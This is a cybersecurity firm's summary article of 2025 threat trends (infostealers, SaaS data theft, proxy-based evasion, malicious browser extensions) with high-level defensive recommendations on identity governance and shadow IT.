Philip Roberts | 11 February 2026        

Overview

Across all campaigns observed in 2025, Fortian identified a clear departure from traditional perimeter-focused intrusion toward attacks that exploit identity, SaaS platforms, browsers, and other technologies that now sit at the core of modern business operations. As organisations continued to dissolve the network perimeter through Zero Trust architectures and distributed cloud services, threat actors adjusted accordingly, shifting their focus to the identity plane and to platforms that aggregate access to high-value data but are often inconsistently governed.

Across 2025, Fortian observed four dominant and interconnected threat trends:

1. The resurgence of infostealer-driven identity compromise
2. Large-scale data theft via poorly governed SaaS platforms
3. Widespread defence evasion through residential IP proxying and abuse of trusted infrastructure, and
4. The emergence of browser-native attacks that operate entirely outside traditional endpoint controls.

1. Infostealer Malware

Infostealer malware emerged as the dominant enabler of modern attack chains, reflecting a broader move toward scalable, low-friction identity compromise rather than destructive outcomes.

These campaigns prioritised the theft of credentials and session tokens, enabling delayed compromise, resale of access, and follow-on attacks months after initial infection.

Infection vectors shifted away from email-based phishing toward instruction-driven execution techniques such as ClickFix, SEO poisoning, and malicious content hosted on trusted platforms.

This mirrors a wider trend in which attackers exploit user trust in browsers, cloud services, and developer platforms, rather than attempting to bypass hardened operating systems or email gateways.

2. Data theft by SaaS Platforms

Fortian also observed a marked increase in data theft via Software as a Service platforms, particularly where these platforms operate outside centralised identity governance and security monitoring.

Salesforce emerged as a primary target in 2025, with threat actors leveraging helpdesk vishing and OAuth consent abuse to achieve rapid, tenant-level access and high-volume data exfiltration.

These campaigns did not rely on software vulnerabilities, but instead exploited organisational process gaps, fragmented identity models, and the absence of consistent entitlement management across SaaS environments.

The speed and scale of these compromises highlight how cloud platforms can compress attack timelines when governance and detection controls lag behind adoption.

3. Defence Evasion

Defence evasion was a defining feature of threat activity in 2025.

Threat actors across all levels of sophistication adopted residential IP proxy networks and abused legitimate cloud and line-of-business platforms for phishing, malware delivery, and command-and-control.

These techniques allowed malicious activity to blend into normal consumer and enterprise traffic, significantly reducing the effectiveness of IP reputation, geofencing, and static indicators.

Fortian’s observations reinforce a broader industry shift away from network-centric controls toward behavioural, identity-aware detection strategies that operate across users, devices, and applications.

4. Living-off-the-Browser Attacks

A further evolution observed in 2025 was the emergence of Living-off-the-Browser attacks, where malicious browser and IDE extensions abuse native application functionality to perform credential theft and data exfiltration without deploying traditional malware.

This reflects a structural blind spot in many organisations, where endpoints are heavily hardened but the browser remains largely ungoverned despite functioning as the primary interface to SaaS, identity providers, financial services, and AI tools.

As browsers increasingly act as the execution environment for sensitive workflows, they have become a high-value target for threat actors seeking to avoid operating system-level detection entirely.

A Note About AI

While no single campaign observed by Fortian relied exclusively on AI, its influence was evident across multiple threat classes.

AI lowered barriers for threat actors by enabling more convincing phishing and vishing lures, accelerating malware development, and increasing the operational velocity of campaigns.

At the same time, enterprise adoption of AI and emerging agentic systems expanded the attack surface, introducing new identity types, new trust relationships, and new governance challenges that are not yet well addressed by existing security models.

Defensive Imperatives (Key takeaways)

The findings in this report point to two enduring strategic defensive imperatives for organisations entering 2026.  

1. ‍Securing the identity layer: Looking into 2026, strengthening controls across the entire identity stack should be a core security mandate for organisations. Every major threat trend observed by our Security Operations Centre over the past year incorporated identity compromise, either as the primary objective or as a prerequisite for post-exploitation activity. Organisations must therefore take a holistic view of identity, including who is accessing the environment, how that access is authenticated and brokered, and which systems, applications, and data those identities can reach. With this visibility, organisations can apply consistent and proportionate security controls across the entire user base. Achieving this requires centralised identity governance and lifecycle management through a single primary identity provider that federates access to all resources, both on-premises and SaaS. Access can then be further strengthened through enforced device compliance and phishing-resistant multi-factor authentication, providing organisations with greater assurance and control over how identities interact with critical systems and data.‍
2. Eliminating shadow IT and enforcing consistent governance: Campaigns observed in 2025 demonstrated that threat actors have a clear understanding of where enterprise environments lack robust governance, security controls, and monitoring. These gaps, particularly in SaaS platforms and user-facing technologies, enabled attackers to bypass traditional security controls and obtain near-unrestricted access to high-value data stores. This risk is further amplified by the rapid adoption of AI, including the deployment of unsanctioned AI tools, models, and autonomous agents, as well as the uncontrolled upload of sensitive data to external AI services. Entering 2026, organisations should prioritise identifying, inventorying, and governing all technologies that provide access to, or store, large volumes of data, with particular focus on SaaS applications and web browsers, which increasingly act as the primary brokers for identity, access, and data movement.

Taken together, these findings underscore the need for organisations to realign security strategy with the realities of modern enterprise architecture, prioritising identity, governance, and behavioural detection to remain resilient against evolving threats.

‍

As stated previously, this article provides a summary of the key observations and themes from the full report. The complete report includes deeper technical analysis, additional case examples, and more detailed defensive guidance, and is available on request directly from Fortian via the link below.